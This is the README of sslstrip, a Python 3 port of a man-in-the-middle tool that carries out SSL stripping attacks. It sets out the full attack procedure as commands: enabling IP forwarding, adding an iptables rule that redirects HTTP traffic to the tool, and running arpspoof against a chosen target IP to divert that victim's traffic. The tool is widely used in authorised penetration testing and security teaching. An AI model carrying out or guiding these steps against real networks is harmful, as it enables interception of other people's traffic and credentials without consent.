sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.
Ported from Python v2 to v3 by Jay Townsend (theHarvester, Discover, and DNSrecon).
Jay "L1ghtn1ng" Townsend @jay_townsend1
Requirements:
pip3 install -r requirements.txt
Install the requirements in a virtualenv
Running:
sslstrip can be run from the source base without installation.
Run as a normal user to see options.
python3 sslstrip.py -h
-
As root, enable IP forwarding:
echo "1" > /proc/sys/net/ipv4/ip_forward -
As root, setup iptables to intercept HTTP requests:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <your listen port> -
Run sslstrip with the options you prefer.
-
As root, run arpspoof to redirect traffic to your host:
arpspoof -i <your network interface> -t <target IP> <routers IP>